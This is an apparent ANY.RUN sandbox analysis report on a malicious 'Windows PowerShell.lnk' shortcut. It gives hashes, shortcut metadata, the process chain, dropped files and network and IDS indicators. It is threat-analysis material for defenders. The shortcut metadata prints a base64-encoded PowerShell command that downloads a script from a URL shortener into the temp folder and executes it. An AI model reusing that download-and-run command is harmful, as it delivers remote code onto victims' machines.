analyze malware
- Huge database of samples and IOCs
- Custom VM setup
- Unlimited submissions
- Interactive approach
| File name: | Windows PowerShell.lnk |
| Full analysis: | https://app.any.run/tasks/666e0cce-b438-484d-9f40-58033ceb81e6 |
| Verdict: | Malicious activity |
| Analysis date: | October 30, 2024 at 13:02:37 |
| OS: | Windows 10 Professional (build: 19045, 64 bit) |
| Indicators: | |
| MIME: | application/x-ms-shortcut |
| File info: | MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Unicoded, MachineID windows11, EnableTargetMetadata KnownFolderID 1AC14E77-02E7-4E5D-B744-2EB1AE5198B7, Archive, ctime=Fri Feb 16 21:44:00 2024, atime=Thu Oct 3 09:53:00 2024, mtime=Fri Feb 16 21:44:00 2024, length=450560, window=showminnoactive, IDListSize 0x020d, Root folder "20D04FE0-3AEA-1069-A2D8-08002B30309D", Volume "C:\", LocalBasePath "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" |
| MD5: | 02E1F1EA7DC301147433623D31E5A294 |
| SHA1: | B882F489808747B6201B113D306A42D533CA229E |
| SHA256: | DE6D56AE01166232F2CB403C86D2DDF59D7654510100971FCD0FE59A3A8E9944 |
| SSDEEP: | 48:8FfT0u6AZyNswxtGTLqHLjOQIBJBSRC3+GU:8FfT0IyNhMLqHzIT5+G |
MALICIOUS
No malicious indicators.SUSPICIOUS
Starts CMD.EXE for commands execution
- powershell.exe (PID: 5516)
- cmd.exe (PID: 1572)
Executing commands from ".cmd" file
- powershell.exe (PID: 5516)
Base64-obfuscated command line is found
- cmd.exe (PID: 1572)
Application launched itself
- cmd.exe (PID: 1572)
- powershell.exe (PID: 2076)
BASE64 encoded PowerShell command has been detected
- cmd.exe (PID: 1572)
Starts POWERSHELL.EXE for commands execution
- cmd.exe (PID: 1572)
- powershell.exe (PID: 2076)
CSC.EXE is used to compile C# code
- csc.exe (PID: 1452)
Executable content was dropped or overwritten
- csc.exe (PID: 1452)
INFO
No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
TRiD
| .lnk | | | Windows Shortcut (100) |
|---|
EXIF
LNK
| Flags: | IDList, LinkInfo, RelativePath, WorkingDir, CommandArgs, Unicode, TargetMetadata |
|---|---|
| FileAttributes: | Archive |
| CreateDate: | 2024:02:16 21:44:00+00:00 |
| AccessDate: | 2024:10:03 09:53:00+00:00 |
| ModifyDate: | 2024:02:16 21:44:00+00:00 |
| TargetFileSize: | 450560 |
| IconIndex: | (none) |
| RunWindow: | Show Minimized No Activate |
| HotKey: | (none) |
| TargetFileDOSName: | powershell.exe |
| DriveType: | Fixed Disk |
| DriveSerialNumber: | 7CEA-241E |
| VolumeLabel: | - |
| LocalBasePath: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| RelativePath: | ..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| WorkingDirectory: | C:\Windows\system32 |
| CommandLineArguments: | -e aQB3AHIAIABpAHMALgBnAGQALwBqAHcAcgA3AEoARAAgAC0AbwAgACQAZQBuAHYAOgBUAE0AUAAvAC4AYwBtAGQAOwAmACAAJABlAG4AdgA6AFQATQBQAC8ALgBjAG0AZAA= |
| MachineID: | windows11 |
Total processes
203
Monitored processes
79
Malicious processes
2
Suspicious processes
0
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 696 | cmd /c exit 86 | C:\Windows\System32\cmd.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 86 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 860 | cmd /c exit 110 | C:\Windows\System32\cmd.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 110 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 860 | cmd /c exit 46 | C:\Windows\System32\cmd.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 46 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 944 | cmd /c exit 89 | C:\Windows\System32\cmd.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 89 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 944 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RESEE31.tmp" "c:\Users\admin\AppData\Local\Temp\CSC6ADC1DC896B34852886CC2A4CF5F2E6C.TMP" | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | — | csc.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft® Resource File To COFF Object Conversion Utility Exit code: 0 Version: 14.32.31326.0 Modules
| |||||||||||||||
| 1204 | cmd /c exit 57 | C:\Windows\System32\cmd.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 57 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1428 | cmd /c exit 121 | C:\Windows\System32\cmd.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 121 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1452 | "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\e1xmrxit.cmdline" | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | powershell.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Visual C# Command Line Compiler Exit code: 0 Version: 4.8.9037.0 built by: NET481REL1 Modules
| |||||||||||||||
| 1572 | C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\.cmd"" | C:\Windows\System32\cmd.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1752 | cmd /c exit 114 | C:\Windows\System32\cmd.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 114 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
Total events
15 691
Read events
15 691
Write events
0
Delete events
0
Modification events
Executable files
1
Suspicious files
9
Text files
10
Unknown types
0
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 5516 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\8FD5CTIJH0MTV6XXAX2L.temp | binary | |
MD5:07EE9A6A8413CBDDA59734DF3316994D | SHA256:3E90456FBAEF1FD7FF85119876D796064B12F3309E137280B39497F605330E14 | |||
| 5516 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF8c24f.TMP | binary | |
MD5:D040F64E9E7A2BB91ABCA5613424598E | SHA256:D04E0A6940609BD6F3B561B0F6027F5CA4E8C5CF0FB0D0874B380A0374A8D670 | |||
| 5516 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms | binary | |
MD5:07EE9A6A8413CBDDA59734DF3316994D | SHA256:3E90456FBAEF1FD7FF85119876D796064B12F3309E137280B39497F605330E14 | |||
| 5516 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_j4ups22e.bcj.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 5516 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_kn5nfhsm.yr2.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 5516 | powershell.exe | C:\Users\admin\AppData\Local\Temp\.cmd | text | |
MD5:A07FCB39B340AD8DEA993A5F5C4D9064 | SHA256:EEB86BDD38DC4FA93046F3CC0E443018518B81828D34E5D1E75F3BD9AAB0F8A7 | |||
| 2076 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_zquxmdfi.rqv.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 2076 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_kh2qbkrc.ufn.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 2076 | powershell.exe | C:\Users\admin\AppData\Local\Temp\e1xmrxit.0.cs | text | |
MD5:2C592480A51FF7A7D45E4233EF0D7AEE | SHA256:6A7DE1714F4980AFD5CD7BCF889AC569AB62424367BBD3933826CF79BFC22136 | |||
| 2076 | powershell.exe | C:\Users\admin\AppData\Local\Temp\e1xmrxit.cmdline | text | |
MD5:03548FA05C0CD3999D930348A6AA87FA | SHA256:68B88F4BCDEB62F9AE897E1A173F373B21DE91A598F2E377865F1224487E0EBD | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
36
DNS requests
16
Threats
2
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
3916 | svchost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | — | — | whitelisted |
5516 | powershell.exe | GET | 301 | 104.25.234.53:80 | http://is.gd/jwr7JD | unknown | — | — | shared |
4360 | SearchApp.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D | unknown | — | — | whitelisted |
5616 | SIHClient.exe | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | — | — | whitelisted |
5616 | SIHClient.exe | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | — | — | whitelisted |
6720 | backgroundTaskHost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D | unknown | — | — | whitelisted |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
— | — | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
— | — | 2.23.209.143:443 | th.bing.com | Akamai International B.V. | GB | whitelisted |
4020 | svchost.exe | 239.255.255.250:1900 | — | — | — | whitelisted |
3916 | svchost.exe | 20.190.159.0:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
3916 | svchost.exe | 192.229.221.95:80 | ocsp.digicert.com | EDGECAST | US | whitelisted |
5516 | powershell.exe | 104.25.234.53:80 | is.gd | CLOUDFLARENET | US | shared |
5516 | powershell.exe | 104.25.234.53:443 | is.gd | CLOUDFLARENET | US | shared |
5516 | powershell.exe | 140.82.121.4:443 | github.com | GITHUB | US | shared |
5516 | powershell.exe | 185.199.110.133:443 | objects.githubusercontent.com | FASTLY | US | shared |
DNS requests
Domain | IP | Reputation |
|---|---|---|
login.live.com |
| whitelisted |
ocsp.digicert.com |
| whitelisted |
is.gd |
| shared |
github.com |
| shared |
objects.githubusercontent.com |
| shared |
go.microsoft.com |
| whitelisted |
th.bing.com |
| whitelisted |
settings-win.data.microsoft.com |
| whitelisted |
slscr.update.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
Threats
PID | Process | Class | Message |
|---|---|---|---|
— | — | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage |
— | — | Misc activity | ET INFO URL Shortener Service Domain in DNS Lookup (is .gd) |